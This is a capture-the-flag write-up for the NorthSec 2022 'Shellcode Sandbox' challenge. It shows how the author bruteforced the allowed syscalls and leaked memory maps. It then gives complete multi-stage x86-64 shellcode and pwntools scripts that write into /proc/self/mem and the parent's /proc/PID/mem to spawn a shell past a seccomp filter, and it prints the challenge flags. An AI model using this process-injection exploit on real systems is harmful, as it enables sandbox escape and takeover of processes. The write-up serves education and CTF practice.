[NorthSec CTF 2022] - Shellcode Sandbox

I’ve been told that there’s a service running in our infrastructure used by the API team to offload part of their computations. I have a bad feeling about it! Could you take a look at it and make sure it’s safe? There’s a rumour going around that there’s confidential information in some file named flag.txt.

Description
#

The description of the challenge only specifies a hostname and a port, but no binary is provided. Upon connecting to the remote host, a message clarifies the goal.

I'll read 128 bytes of your best shellcode and execute it.

Sounds promising…

My first reflex was to setup a quick execve shellcode with pwntools. The shellcraft module generates shellcodes quickly and easily.

def connection():
    p = remote("opsandbox.ctf", 31211)
    p.recvuntil(b"I'll read 128 bytes of your best shellcode and execute it.\n")
    return p

context.arch = "amd64"
shellcode = shellcraft.linux.sh()
p = connection()
p.sendline(asm(shellcode))
p.interactive()

Unsurprinsingly, this didn’t do anything and the connection simply closed. Well, the challenge must be called Shellcode sandbox for a reason!

Basic Shellcoding
#

Let’s start with a more basic shellcode and build on top of it. If you’re not familiar with shellcoding, I suggest you learn about assembly and the system call calling convention on 64 bits systems before going further.

The most basic functionnality we could create is a simple call to write to retrieve information from the server.

# push some value
push 0xdeadbeefcafebabe
# call write
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall

And it works! We get the desired value from the socket on our side. We can use this to get the return values of other system calls and debug our shellcode.

Now, if we can’t use execve, maybe we’re just supposed to read the flag from a file. The descriptions does talk about flag.txt. Let’s craft a simple open, read, write shellcode.

# push b'flag.txt\x00'
push 1
dec byte ptr [rsp]
mov rax, 0x7478742e67616c66
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
mov rdi, rax
# allocate space for the flag
mov rsi, rsp
sub rsp, 80
# call read
mov rdx, 80
mov rax, 0
syscall
# call write
mov rdi, 1
mov rax, 1
syscall

We send it to the server and just like that, we get the flag!

Flag: FLAG-38cad243d37e7a2df426bba4bc50c408

The Real Challenge
#

When the flag is submitted, we get the following message.

Good job, but can you get a shell?

Oh, so this was just the beginning. The first flag was pretty easy to get. However, it didn’t seem like we can use the execve syscall, so how can we get a shell?

I was pretty sure that the sandbox was implemented using SECCOMP. Therefore, I had to try using the classic bypass of adding 0x40000000 to the syscall number, but no luck there.

If the sandbox really is at the system call level, I needed to know which ones I could use, so I bruteforced them all. I found that Linux has 335 syscalls, so I called them one by one and read the return code.

allowed = []
for i in range(336):
    shellcode = """
        mov rax, {}
        syscall
        push rax
        # call write
        mov rdi, 1
        mov rsi, rsp
        mov rdx, 8
        mov rax, 1
        syscall
    """.format(i)

    p = connection()
    p.sendline(asm(shellcode))
    p.recvuntil(b"[+] Running shellcode\n")
    result = p.recvuntil(b"[+] Done")[:-8]
    if len(result) > 0:
        print(f"{i}: {result}")
        allowed.append(i)
print(allowed)

Almost every syscall should leave the process alive even if it fails (except syscalls like exit, but it would be useless anyways). We can then read back the return code using write. However, when a syscall is forbidden by the SECCOMP filter, calling it instantly kills the process, closing the connection without any output.

My script seemed to work… until I saw the result. Only 4 syscalls were allowed:

read
write
open
lseek

I immediately tought there must have been a mistake, because there is no way these could be used to get a shell!

However, after submitting the first flag, the challenge description was updated with a new message.

Good work! Do you think you are able to get further?
Maybe this will be useful: https://blog.f0b.org/

It linked to the creator’s blog, which contains in-depth research about Linux process injection! Maybe there was actually a way…

Process Injection
#

If we could open the raw memory file of a process, maybe we could inject some shellcode into the .text section. The /proc/PID/mem file is a special kernel file that links to the virtual memory of a process. If our process has the needed rights to open it, it means we can modify the memory of a process while only using open, lseek, read and write!

Usually, to use such file we need the PID of the target process because it’s part of the path. However, the /proc/self directory is a symlink to the proc folder of the current process and doesn’t need a PID! Let’s make a quick test before going further.

# push /proc/self/mem
mov rax, 0x6d656d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
# save the return code
push rax
# call write
mov rdi, 1
mov rdi, rsp
mov rdx, 8
mov rax, 1
syscall

Fortunately, it worked! This shellcode returns the return value of open, which is actually the new file descriptor number. The file was opened in read-write mode, which means we can probably inject data into memory.

The /proc/self/mem file is a representation of virtual memory, so we need virtual addresses to make use of it. Since we have no binary, we can’t get them from there, and at this point we can’t even know if the program has ASLR or PIE enabled. We can get around that by using the /proc/self/maps file. Similarly, this is a special file which contains information about the running process, in this case the memory map.

I knew I would have to read a couple of files, so I made a function to do just that.

def push_filename(filename):
    result = ""
    # Adding a null byte if the length is a multiple of 8
    if len(filename) % 8 == 0:
        result += "push 1\n"
        result += "dec byte ptr [rsp]\n"

    for i in range(len(filename) - (len(filename)%8), -1, -8):
        if i + 8 > len(filename):
            value = u64(filename[i:len(filename)].ljust(8, b"\x00"))
        else:
            value = u64(filename[i:i+8])
        if i != len(filename):
            result += f"mov rax, {hex(value)}\n"
            result += "push rax\n"
    return result

def read_file(filename, size=80):
    shellcode = """
    # push filename
    {0}
    # call open('rsp', 'O_RDONLY', 0)
    push SYS_open # 2
    pop rax
    mov rdi, rsp
    xor esi, esi # O_RDONLY
    cdq # rdx=0
    syscall
    # save the file descriptor
    mov rdi, rax
    # allocate space for the flag
    mov rsi, rsp
    sub rsp, {1}
    # call read
    mov rdx, {1}
    mov rax, 0
    syscall
    # call write
    mov rdi, 1
    mov rax, 1
    syscall
    """.format(push_filename(filename.encode()), size)

    p = connection()
    p.sendline(asm(shellcode))
    p.recvuntil(b"Running shellcode\n")
    return p.recvuntil(b"[+] Done")[:-8]

Memory Maps
#

With this script, I can now dump the contents of /proc/self/maps and inspect the memory map of our process.

55c4df67f000-55c4df680000 r--p 00000000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df680000-55c4df681000 r-xp 00001000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df681000-55c4df682000 r--p 00002000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df682000-55c4df683000 r--p 00002000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df683000-55c4df684000 rw-p 00003000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
7f016473d000-7f0164762000 r--p 00000000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164762000-7f01648da000 r-xp 00025000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f01648da000-7f0164924000 r--p 0019d000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164924000-7f0164925000 ---p 001e7000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164925000-7f0164928000 r--p 001e7000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164928000-7f016492b000 rw-p 001ea000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f016492b000-7f0164931000 rw-p 00000000 00:00 0 
7f0164934000-7f0164935000 r--p 00000000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164935000-7f0164958000 r-xp 00001000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164958000-7f0164960000 r--p 00024000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164960000-7f0164961000 r-xp 00000000 00:00 0 
7f0164961000-7f0164962000 r--p 0002c000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164962000-7f0164963000 rw-p 0002d000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164963000-7f0164964000 rw-p 00000000 00:00 0 
7ffffcedb000-7ffffcefc000 rw-p 00000000 00:00 0                          [stack]
7ffffcfe2000-7ffffcfe6000 r--p 00000000 00:00 0                          [vvar]
7ffffcfe6000-7ffffcfe8000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

After running it a few times, it became clear that the binary was compiled with the most common exploit protections: NX, ASLR and PIE. Therefore, we will need to retrieve the memory map everytime we make a new connection, as a new process will be spawned and new addresses generated.

Second Flag
#

Now that we can read our own memory, I decided to dump the .text section to reverse engineer the binary. I needed to retrieve the contents of /proc/self/maps, parse the address of the section and read a full page to the open socket.

# push /proc/self/maps
mov rax, 0x7370616d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
mov rdi, rax
# call read
mov rsi, rsp
mov rdx, 200
mov rax, 0
syscall
# call write
mov rdi, 1
mov rax, 1
syscall
# read PIE base address
mov rdi, 0
mov rsi, rsp
mov rdx, 8
mov rax, 0
syscall
# call write
mov rdi, 1
pop rsi
mov rdx, 4096
mov rax, 1
syscall

I chose to do all the parsing in the python script for simplicity and efficiency. Let’s keep in mind that we only have 128 bytes of shellcode to play with.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Get PIE base address
p.recvuntil(b"r--p")
p.recvline()
pie_base = int(p.recvuntil(b"r-xp").split(b" ")[0].split(b"-")[1].decode(), 16)
print(f"PIE base @ {hex(pie_base)}")

# Send it back
p.recvuntil(b"/hom")
p.send(p64(pie_base))

# Write .text section to file
with open("binary", "wb") as outfile:
    outfile.write(p.recvuntil(b"[+] Done in 0 seconds")[:-21])

Hidden in the code of the executable was a second flag!

FLAG-48b6d45d682a93061eee7e4094c9aa9d

Unfortunately, this flag didn’t give any points… I guess it was just a hint that we’re in the right direction. The code section didn’t really help more than that.

Finding Our Parent
#

Reading the code of the binary was fun but to gain code execution we will need to write data into an executable section. But wait, we already have code execution: 128 bytes of code execution to be precise! To get around the sandbox we will have to inject into another process…

Our parent process is probably a good target. We know there is a process listening for connections. It probably forks after returning from accept and it would be logical that only the child process applies the SECCOMP filter to itself before executing the shellcode.

We know we can inject some data by writing to /proc/PID/mem, so we need our parent’s PID. The proc filesystem can help us find the PID in /proc/self/stat, so we use almost the same shellcode to retrieve it, parse the values and send back the appropriate /proc/PID/mem filename.

Now we can chain both steps to create a shellcode which will open the virtual memory of our parent process!

# push /proc/self/maps
mov rax, 0x7370616d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read filename
xor rdi, rdi
push rsp
pop rsi
push 24
pop rdx
xor rax, rax
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# write return code
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

The proc manpage specifies that the parent PID is in the fourth position, so we can easily parse it in python.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Parse /proc/self/stat
p.recvuntil(b") R ")
ppid = int(p.recvuntil(b" "))
print(f"parent PID is {hex(ppid)}")

# Send back the filename
p.send(flat([f"/proc/{ppid}/mem"], length=24, filler=b"\x00"))
p.interactive()

Once again we get the new file descriptor. It’s good to know we have sufficient permissions!

Now where do we want to write data into the memory of our parent? We don’t really know where the instruction pointer will be, but it will certainly pass by the .text region. It would be wise to override the whole section with a huge a NOP sled to make sure our shellcode gets executed. Therefore, all we need to do is read the memory map from /proc/PID/maps, use lseek to go to the right offset and write the payload.

Where It Gets Complicated
#

As if it wasn’t complicated enough, we only have 128 bytes to accomplish all these tasks. I started modifying bits of the shellcode to reduce its size. Certain operations can be done in multiple ways and some take less bytes than others. I transformed all the assignments of values from mov to push or xor in the special case of 0.

# Before
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 0
syscall
# After
push 1
pop rdi
push rsp
pop rsi
push 8
pop rdx
xor rax, rax
syscall

I also tried to reuse register values between syscalls, for instance the size in rdx for calls read and write.

Unfortunately, the shellcode was still too long. I immediately tought of creating a second stage of shellcode. The only reason we didn’t write shellcode inside our own process is because the SECCOMP filter is active, but there is nothing preventing us from extending our shellcode!

Finding Ourself
#

I didn’t see any trace of our shellcode when I dumped the .text section of our program earlier. This must means that the shellcode is written to a different executable region. There are multiple unnamed executable regions in the memory map, so the best way to find ourself would be to directly leak the instruction pointer.

lea rax, [rip]
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

This tiny shellcode returns the RIP register and indicates that the code runs in the beginning of one of those regions.

Since we know our shellcode is exactly 128 bytes long, we can pad the extra space with NOP operations and write an extension directly after.

# push /proc/self/maps
mov rax, 0x7370616d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read region base address, filename and stage2
xor rdi, rdi
push rsp
pop rsi
push 1048
pop rdx
xor rax, rax
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# load region base
add rsp, 16
pop rsi
# call lseek
xor rdx, rdx
push 8
pop rax
syscall
# call write with the shellcode
push rsp
pop rsi
push 1024
pop rdx
push 1
pop rax
syscall

At this point it’s very important to send all the necessary data to the process in one shot to reduce the number of calls.

We modify our python script to send a second stage which only writes a recognizable value to the socket.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Get executable region base address
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
region_base = int(p.recvuntil(b"r-xp").split(b"\n")[-1].split(b" ")[0].split(b"-")[0].decode(), 16)
print(f"[*] executable region base @ {hex(region_base)}")

stage2 = """
# success indicator
mov rax, 0x6262626262626262
push rax
# call write
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall
"""
assembled2 = asm(stage2)

# Send filename, region base and stage2
p.send(flat(["/proc/self/mem"], length=16, filler=b"\x00") + p64(region_base+128) + assembled2 + b"\x90"*(1024-len(assembled2)))
p.interactive()

And it works! With this technique, we have a virtually infinite number of operations for our shellcode!

The Final Exploit
#

Wrapping it all together, we now have 3 stages to our exploit. The first one retrieves /proc/self/maps to find the randomized address of the executable region where the shellcode is stored. It reads back that address in binary form with an additionnal offset of 128 as well as the second stage of the payload. Then, it opens /proc/self/mem, uses lseek to go to the desired address and writes the second stage there.

# push /proc/self/maps
mov rax, 0x7370616d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 22
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read region base address, filename and stage2
xor rdi, rdi
push rsp
pop rsi
push 1048
pop rdx
xor rax, rax
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# load region base
add rsp, 16
pop rsi
# call lseek
xor rdx, rdx
push 8
pop rax
syscall
# call write with the shellcode
push rsp
pop rsi
push 1024
pop rdx
push 1
pop rax
syscall
# write return code
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

Once the first stage is completely executed, a small NOP sled will lead to the execution of the second stage, which does the actual work. It retrieves the contents of /proc/self/stat, then reads back the correct path to the /proc/PID/maps of the parent process and leaks it as well. Finally, it reads the target address, the target /proc/PID/mem filename and the stage 3 payload and use them to inject code into the parent process.

# push /proc/self/stat
mov rax, 0x746174732f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
mov rdi, rax
# call read
mov rsi, rsp
mov rdx, 40
mov rax, 0
syscall
# call write
mov rdi, 1
mov rax, 1
syscall
# read parent maps filename
mov rdi, 0
mov rsi, rsp
mov rdx, 24
mov rax, 0
syscall
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read parent mem filename, address and payload
mov rdi, 0
mov rsi, rsp
mov rdx, 1048
mov rax, 0
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# load PIE base
add rsp, 16
pop rsi
# call lseek
xor rdx, rdx
push 8
pop rax
syscall
# call write with the shellcode
push rsp
pop rsi
push 1024
pop rdx
push 1
pop rax
syscall
# write return code
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

The third stage is a big NOP sled followed by a shellcode that spawns a shell generated by pwntools. Here is the final exploit script.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Get PIE base address
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
region_base = int(p.recvuntil(b"r-xp").split(b"\n")[-1].split(b" ")[0].split(b"-")[0].decode(), 16)
print(f"[*] executable region base @ {hex(region_base)}")

# Send filename, region base and stage2
p.send(flat(["/proc/self/mem"], length=16, filler=b"\x00") + p64(region_base+128) + assembled2 + b"\x90"*(1024-len(assembled2)))
p.recvuntil(b"a"*8)

p.recvuntil(b") R ")
ppid = int(p.recvuntil(b" "))
print(f"[*] parent PID is {ppid}")

# Send parent PID filename
p.send(flat([f"/proc/{ppid}/maps"], length=24, filler=b"\x00"))

# Leak parent PIE base
parent_pie = int(p.recvuntil(b"r-xp").split(b"\n")[-1].split(b" ")[0].split(b"-")[0].decode(), 16)
print(f"[*] parent PIE base @ {hex(parent_pie)}")

stage3 = """
# success indicator
mov rax, 0x6262626262626262
push rax
# call write
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall
"""
stage3 += shellcraft.linux.sh()
assembled3 = asm(stage3)

# Send parent mem filename, address and stage3
p.send(flat([f"/proc/{ppid}/mem"], length=16, filler=b"\x00") + p64(parent_pie) + b"\x90"*(1024-len(assembled3)) + assembled3)

p.interactive()

After this long journey, we are finally granted a shell and we can find the flag in a randomized filename.

Flag: FLAG-6d12f0f23b3832cf6d975d702d2f8cb7

Conclusion
#

This was a very interesting and creative challenge. I love this kind of minimalistic challenge where you are so restricted that you honestly think that it’s impossible. At the end, I did learn a few things and I had a lot of fun. A big thanks to the creator, f0b, for bringing low level Linux challenges to the NorthSec competition!

Description #

Basic Shellcoding #

The Real Challenge #

Process Injection #

Memory Maps #

Second Flag #

Finding Our Parent #

Where It Gets Complicated #

Finding Ourself #

The Final Exploit #

Conclusion #